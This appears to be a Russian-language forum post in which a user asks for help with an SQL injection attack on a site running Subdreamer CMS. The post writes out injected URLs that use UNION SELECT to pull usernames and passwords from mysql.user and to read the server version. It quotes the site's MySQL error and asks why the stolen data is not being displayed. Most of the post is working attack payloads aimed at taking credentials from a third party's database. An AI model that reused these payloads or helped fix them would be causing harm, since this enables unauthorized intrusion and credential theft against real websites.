Я уже спрашивал, но спрошу еще раз ) Просто появились еще вопросы) Есть сайт )) Допустим
sitename.ru/ Там есть такой раздел index.php?categoryid=1&p45;_yearid=1 )) Делую так
sitename.ru/index.php?categoryid=1&p45;_yearid=1' выводиться ошибка ) Нашел ошибку спайдером )) Дальше делал так
sitename.ru/index.php?categoryid=1&p45;_yearid=1+union+select+1,2,3,concat(user,0x3a,password)+from+mysql.user/* )) Все нормально )) Должны были выдаться заветные логины и пароли, но не отабразились ) Ошибка отобразилась в календаре ))
База данных Sabdrimer CMS
Неправильный SQL: SELECT title, categoryid, articleid, IF(datestart = 0, IF(dateupdated = 0, datecreated, dateupdated), datestart) AS date
FROM sd_p2_news
WHERE (settings & 2)
AND MONTH(FROM_UNIXTIME(IF(datestart = 0, IF(dateupdated = 0, datecreated, dateupdated), datestart))) = 3 AND
YEAR(FROM_UNIXTIME(IF(datestart = 0, IF(dateupdated = 0, datecreated, dateupdated), datestart))) = 1'
Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Номер ошибки: 1064
Дата: Saturday 14th 2009f March 2009 01:11:32 AM
Файл:
sitename.ru/index.php
Я когда подобрал столбцы они нигде не отобразились ) Думал может пароли с лагинами где-то отобразились, но нет ) Почему? Мне ответили, что нет доступа в mysql.user)) Но а почемуже когда я хочу даже просто посматреть версию все равно нигде не отражаеться? По сути должно отразиться в календаре, там же где и ошибка ) Версию я смотрел так
sitename.ru/index.php?categoryid=1&p45;_yearid=1+union+select+1,2,3,version()/* Запрос выполняеться ) все нормально) НО не отображаеться то, что мне нужно )